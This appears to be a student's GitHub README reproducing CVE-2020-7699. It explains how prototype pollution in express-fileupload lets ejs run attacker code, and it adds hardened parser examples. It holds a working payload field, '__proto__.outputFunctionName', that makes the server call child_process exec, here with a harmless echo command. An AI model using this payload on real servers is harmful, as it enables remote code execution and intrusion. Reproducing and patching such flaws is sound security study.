Reproduction of CVE-2020-7699, final project for the Principles of Software Security course

hemaoqi-Tom/CVE-2020-7699_reproduce


CVE-2020-7699 Reproduction

Reproduction of the Node.js RCE vulnerability CVE-2020-7699; my lab work.

Setup

Node.js version: v14.16.1. Please make sure your Node.js major version is 14 (other versions will probably work, but I did not test them).

Python version: 3.9.5. Python is only used to send the HTTP attack request, so no specific version is required.

Just clone the repo and run npm i to install the dependencies. I added two extra commands:

  • npm run start-server starts the target (victim) server
  • npm run launch-attack launches the attack

Analysis

express-fileupload: versions below 1.1.10 are affected.

express-fileupload contains a prototype pollution vulnerability.

Vulnerability: prototype pollution in express-fileupload (the nested form-field parser walks dotted field names such as a.b.c, so a field named __proto__.x writes onto Object.prototype).

How it is used: pollute __proto__.outputFunctionName so that the polluted value carries the command to execute, e.g. echo "ATTACK SUCCESSFUL" > attacked.txt

```python
# Multipart form fields of the attack request. This mapping is the `files=` argument of a
# requests.post call, so every entry is sent as one multipart part.
# The dotted field name is what the vulnerable express-fileupload nested parser splits on;
# the value is what ejs splices into the compiled template as outputFunctionName.
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

files = {
    "__proto__.outputFunctionName": (
        None,  # no filename: sent as a plain form field rather than a file part
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x",
    ),
}
```

ejs contains an RCE.

Vulnerability: ejs splices the value of opts.outputFunctionName into the source of the compiled template function. Normally that option is undefined, but if Object.prototype.outputFunctionName has been polluted, the property lookup falls through to the prototype, ejs picks up the polluted string, and it is executed as part of the template function (the x;...;x framing of the payload keeps the generated source syntactically valid).
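The two halves of the bug above, modelled on a constructed input. This is an added example, not code from this repo, from express-fileupload or from ejs: a dotted-key form-field parser in the vulnerable shape (a plain property walk, so `__proto__.x` lands on `Object.prototype`) beside a hardened shape that rejects prototype-reaching segments and only descends into own properties, plus an own-property-only option lookup (`ownOption`, a hypothetical helper) that shows the consumer-side guard a template engine would need. The field names and the marker value `x;INJECTED;x` are constructed for the demo; nothing is executed.

```javascript
'use strict';

// Segments that let a dotted key climb out of the target object into a prototype.
const DANGEROUS_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable shape (for contrast only): walks/creates nested objects by plain assignment.
// With the key "__proto__.outputFunctionName", `cur` becomes Object.prototype after one step.
function setPathUnsafe(target, dottedKey, value) {
  const parts = dottedKey.split('.');
  let cur = target;
  for (let i = 0; i < parts.length - 1; i++) {
    if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
}

// Hardened shape: reject any segment that can reach a prototype, and only descend into
// properties the current object itself owns (never into inherited ones).
function setPathSafe(target, dottedKey, value) {
  const parts = dottedKey.split('.');
  if (parts.some((p) => DANGEROUS_SEGMENTS.has(p))) {
    throw new Error(`rejected prototype-polluting key: ${dottedKey}`);
  }
  let cur = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const p = parts[i];
    const own = Object.prototype.hasOwnProperty.call(cur, p);
    if (!own || typeof cur[p] !== 'object' || cur[p] === null) {
      cur[p] = Object.create(null); // null prototype: nothing to inherit, nothing to pollute
    }
    cur = cur[p];
  }
  cur[parts[parts.length - 1]] = value;
}

// Parse a flat multipart field map into a nested object, collecting the keys it refused.
function parseNestedSafe(fields) {
  const parsed = Object.create(null);
  const rejected = [];
  for (const [key, value] of Object.entries(fields)) {
    try {
      setPathSafe(parsed, key, value);
    } catch (e) {
      rejected.push(key);
    }
  }
  return { parsed, rejected };
}

// Consumer-side guard (hypothetical helper): honour an option only if the options object
// owns it, so an inherited (polluted) outputFunctionName is ignored.
function ownOption(opts, name) {
  return Object.prototype.hasOwnProperty.call(opts, name) ? opts[name] : undefined;
}

// Constructed input in the shape of the README's exploit field name, with a harmless
// marker string in place of a command.
const SAMPLE_FIELDS = {
  'user.name': 'alice',
  'user.address.city': 'Shanghai',
  '__proto__.outputFunctionName': 'x;INJECTED;x',
};

// Show the unsafe walk reaching Object.prototype, then undo the pollution so nothing
// leaks into the rest of the process. Returns what a fresh {} saw while polluted.
function demonstrateUnsafe() {
  setPathUnsafe({}, '__proto__.outputFunctionName', 'x;INJECTED;x');
  const seenByFreshObject = ({}).outputFunctionName;
  delete Object.prototype.outputFunctionName;
  return seenByFreshObject;
}

// Run the hardened parser on the same input and report what survived and what was refused.
function demonstrateSafe() {
  const { parsed, rejected } = parseNestedSafe(SAMPLE_FIELDS);
  return {
    city: parsed.user.address.city,
    rejected,
    globalClean: ({}).outputFunctionName === undefined,
    optionSeen: ownOption({}, 'outputFunctionName'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe walk leaked onto Object.prototype:', demonstrateUnsafe());
  console.log('hardened parse:', demonstrateSafe());
}
```

The two independent checks in `setPathSafe` matter together: the segment deny-list stops `__proto__` and `constructor.prototype` routes, while the own-property test plus null-prototype containers stops a later key from descending into something inherited even if a new bypass spelling turns up. On the consuming side, `ownOption` is the shape of fix that makes a template engine immune to a polluted global prototype regardless of which upstream parser let the pollution in.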
